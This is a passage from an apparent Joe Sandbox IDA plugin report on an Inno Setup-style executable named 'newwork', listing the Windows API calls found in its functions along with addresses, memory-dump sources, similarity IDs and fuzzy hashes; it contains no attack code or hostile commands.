                                                                                • Instruction ID: 37dbbd71146fd60ed96ba35b84ff74d599aeccd68d0f9eb37ee109455dfe34ad
                                                                                • Opcode Fuzzy Hash: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
                                                                                • Instruction Fuzzy Hash: B1E06D753012043FE710AA2B9C85F5BBADCDF88365F10403AB908DB392D578DD0181A9
                                                                                APIs
                                                                                • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: NoModify
                                                                                • API String ID: 3702945584-1699962838
                                                                                • Opcode ID: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
                                                                                • Instruction ID: 84621f748531697c6bb4a8e0450a59e651a2caf9945441e4ffcb8bd5fa838dfd
                                                                                • Opcode Fuzzy Hash: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
                                                                                • Instruction Fuzzy Hash: F6E04FB4640308BFEB04DB55CD4AF6B77ECDB48714F10405ABA049B281E674FE00C669
                                                                                APIs
                                                                                • GetACP.KERNEL32(?,?,00000001,00000000,0047E753,?,-0000001A,00480609,-00000010,?,00000004,0000001B,00000000,00480956,?,0045DB68), ref: 0047E4EA
                                                                                  • Part of subcall function 0042E31C: GetDC.USER32(00000000), ref: 0042E32B
                                                                                  • Part of subcall function 0042E31C: EnumFontsA.GDI32(?,00000000,0042E308,00000000,00000000,0042E374,?,00000000,00000000,004809BD,?,?,00000001,00000000,00000002,00000000), ref: 0042E356
                                                                                  • Part of subcall function 0042E31C: ReleaseDC.USER32(00000000,?), ref: 0042E36E
                                                                                • SendNotifyMessageA.USER32(0002047E,00000496,00002711,-00000001), ref: 0047E6BA
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: EnumFontsMessageNotifyReleaseSend
                                                                                • String ID:
                                                                                • API String ID: 2649214853-0
                                                                                • Opcode ID: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
                                                                                • Instruction ID: a62c935d52da393e7312112ce75ddb0898731394ffd2a16b1d4fc3e518f8127d
                                                                                • Opcode Fuzzy Hash: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
                                                                                • Instruction Fuzzy Hash: 5B5195746001049BC710FF67E98169A37E5EB58308B90C67BA8049B3A6DB3CED45CB9D
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0047DF83,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047DF3D
                                                                                  • Part of subcall function 0042CA00: GetSystemMetrics.USER32(0000002A), ref: 0042CA12
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMetricsMultiSystemWide
                                                                                • String ID: /G
                                                                                • API String ID: 224039744-2088674125
                                                                                • Opcode ID: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                                                • Instruction ID: 84c81a41a939c89cd5cf89585cf0d961f9543ff151f38a86aad590f5673b43e0
                                                                                • Opcode Fuzzy Hash: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                                                • Instruction Fuzzy Hash: 53518070A04215AFDB21DF55D8C4FAA7BB8EF64318F118077E404AB3A1C778AE45CB99
                                                                                APIs
                                                                                • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,004021FC), ref: 004020CB
                                                                                  • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0220C590,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                  • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0220C590,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                  • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0220C590,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                  • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0220C590,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                • String ID:
                                                                                • API String ID: 296031713-0
                                                                                • Opcode ID: ab3545b22e3440e815b1719652ff5d854977479bd1b850cbba673e5eb4522dee
                                                                                • Instruction ID: 30adadd309813d1a6846ca6b4958dbaac508113c784b73a5bb8d11bfdb372a30
                                                                                • Opcode Fuzzy Hash: ab3545b22e3440e815b1719652ff5d854977479bd1b850cbba673e5eb4522dee
                                                                                • Instruction Fuzzy Hash: 3941E3B2E00304DFDB10CF69EE8521A77A4F7A8324B15417FD854A77E2D3789801DB88
                                                                                APIs
                                                                                • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DF6C
                                                                                • RegCloseKey.ADVAPI32(?,0042DFDD,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DFD0
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseEnum
                                                                                • String ID:
                                                                                • API String ID: 2818636725-0
                                                                                • Opcode ID: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                                                • Instruction ID: d62689c7b7995b9893119ef97773413105dd68debc8ff02f2d4f9d8a28cc91ff
                                                                                • Opcode Fuzzy Hash: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                                                • Instruction Fuzzy Hash: DD31B270F04258AEDB11DFA6DD42BAEBBB9EB49304F91407BE501E6280D6785E01CA2D
                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 0045283C
                                                                                • GetLastError.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 00452844
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CreateErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 2919029540-0
                                                                                • Opcode ID: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                • Instruction ID: fcc055d8c1a696a2a0db1e32a085008d871673fec5534948229a16d4440eefa6
                                                                                • Opcode Fuzzy Hash: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                • Instruction Fuzzy Hash: A2113C72600208AF8B40DEA9DD41D9F77ECEB4E310B114567FD18D3241D678EE148B68
                                                                                APIs
                                                                                • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040ADF2
                                                                                • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040AF4F,00000000,0040AF67,?,?,?,00000000), ref: 0040AE03
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$FindFree
                                                                                • String ID:
                                                                                • API String ID: 4097029671-0
                                                                                • Opcode ID: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                                                • Instruction ID: 3d7a77417cef7b3885e8747e4544195f2de945da78ee84bb1155330bb8f828e3
                                                                                • Opcode Fuzzy Hash: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                                                • Instruction Fuzzy Hash: 0301F771300700AFD700FF69EC52E1B77EDDB46714710807AF500AB3D1D639AC10966A
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                • EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$CurrentEnumWindows
                                                                                • String ID:
                                                                                • API String ID: 2396873506-0
                                                                                • Opcode ID: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                                • Instruction ID: bcaa23655132f8f2785c0a842f21b48ac99b37e3223c43442b01e3940dbd0cdf
                                                                                • Opcode Fuzzy Hash: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                                • Instruction Fuzzy Hash: 31015B76A04604BFD706CF6BEC1199ABBE8E789720B22887BEC04D3690E7355C10DF18
                                                                                APIs
                                                                                • MoveFileA.KERNEL32(00000000,00000000), ref: 00452CC2
                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,00452CE8), ref: 00452CCA
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastMove
                                                                                • String ID:
                                                                                • API String ID: 55378915-0
                                                                                • Opcode ID: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                                • Instruction ID: 1f9035ddd188b097fe3d15476f32cd7793c58c8f4df07880d9fc6ba60e4ff235
                                                                                • Opcode Fuzzy Hash: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                                • Instruction Fuzzy Hash: 9401D671A04208AB8712EB799D4149EB7ECEB8A32575045BBFC04E3243EA785E048558
                                                                                APIs
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527A9
                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527B1
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDirectoryErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1375471231-0
                                                                                • Opcode ID: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                • Instruction ID: e3b373b60118a844676bb749001e6832c3b26a50706decb61b3ae2e0e224b701
                                                                                • Opcode Fuzzy Hash: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                • Instruction Fuzzy Hash: 40F02871A00308BBCB01EF759D4259EB7E8EB4E311B2045B7FC04E3642E6B94E04859C
                                                                                APIs
                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 00423249
                                                                                • LoadCursorA.USER32(00000000,00000000), ref: 00423273
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CursorLoad
                                                                                • String ID:
                                                                                • API String ID: 3238433803-0
                                                                                • Opcode ID: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                                • Instruction ID: 5e34cf6406f075c2c63d733b1f02ef4b9a88184ee1572dc0f3c8875cc615d59b
                                                                                • Opcode Fuzzy Hash: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                                • Instruction Fuzzy Hash: 9EF0A711B04254AADA109E7E6CC0D6B72A8DF82735B61037BFA3EC72D1C62E1D414569
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                • LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLibraryLoadMode
                                                                                • String ID:
                                                                                • API String ID: 2987862817-0
                                                                                • Opcode ID: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                                                • Instruction ID: 14c2566281f292fbf4bc3f3871eddb8f7eb4f11f4d1149329263d7d1c8790498
                                                                                • Opcode Fuzzy Hash: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                                                • Instruction Fuzzy Hash: 02F08970B147447FDB119F779CA241BBBECDB49B1175249B6F800A3591E53C4910C928
                                                                                APIs
                                                                                • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 0045090E
                                                                                • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 00450916
                                                                                  • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$FilePointer
                                                                                • String ID:
                                                                                • API String ID: 1156039329-0
                                                                                • Opcode ID: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
                                                                                • Instruction ID: 32d43412562f4d6ab64aa8be608e77008e370c57458e4df53f7444e76f76d0cb
                                                                                • Opcode Fuzzy Hash: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
                                                                                • Instruction Fuzzy Hash: 0EE012E93042015BF700EA6599C1B2F22DCDB44315F00446ABD44CA28BE678CC048B29
                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 2087232378-0
                                                                                • Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                • Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
                                                                                • Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                • Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
                                                                                APIs
                                                                                • GetSystemDefaultLCID.KERNEL32(00000000,00408712), ref: 004085FB
                                                                                  • Part of subcall function 00406DEC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E09
                                                                                  • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                • String ID:
                                                                                • API String ID: 1658689577-0
                                                                                • Opcode ID: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                                                • Instruction ID: 9026c6f0acc6bf601755118861b832b1e3c4c92574a9a05948c89544872af2a3
                                                                                • Opcode Fuzzy Hash: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                                                • Instruction Fuzzy Hash: 47314E35E00109ABCB00EB55CC819EEB779EF84314F558577E815BB286EB38AA018B98
                                                                                APIs
                                                                                • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC39
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: InfoScroll
                                                                                • String ID:
                                                                                • API String ID: 629608716-0
                                                                                • Opcode ID: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                                                • Instruction ID: 6365c2cd079840e4170b7c9ce409c3d873e807bce8729d2e10e5c00059922083
                                                                                • Opcode Fuzzy Hash: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                                                • Instruction Fuzzy Hash: D8214FB1608746AFC351DF3984407A6BBE4BB48344F14893EE498C3741E778E99ACBD6
                                                                                APIs
                                                                                  • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                  • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C4AE,?,00000000,?,?,0046C6C0,?,00000000,0046C734), ref: 0046C492
                                                                                  • Part of subcall function 0041EF58: IsWindow.USER32(?), ref: 0041EF66
                                                                                  • Part of subcall function 0041EF58: EnableWindow.USER32(?,00000001), ref: 0041EF75
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
